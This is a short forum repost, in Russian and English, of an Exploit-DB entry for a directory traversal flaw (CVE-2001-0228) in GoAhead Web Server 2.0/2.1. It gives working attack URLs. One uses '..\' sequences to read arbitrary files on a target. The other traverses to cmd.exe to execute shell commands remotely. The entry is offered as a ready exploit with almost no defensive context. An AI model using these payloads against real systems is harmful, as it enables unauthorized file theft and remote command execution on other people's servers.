Exploit GoAhead Web Server 2.0/2.1 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20607
Проверка EDB
  1. Пройдено
Автор
SERGEY NENASHEV
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2001-0228
Дата публикации
2001-02-02
Код:
source: https://www.securityfocus.com/bid/2334/info

A specially crafted URL composed of '..\' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 

Gaining access to a known file:

http://target/..\..\..\..\..\..\filename

Executing arbitrary commands:

http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
 
Источник
www.exploit-db.com

Похожие темы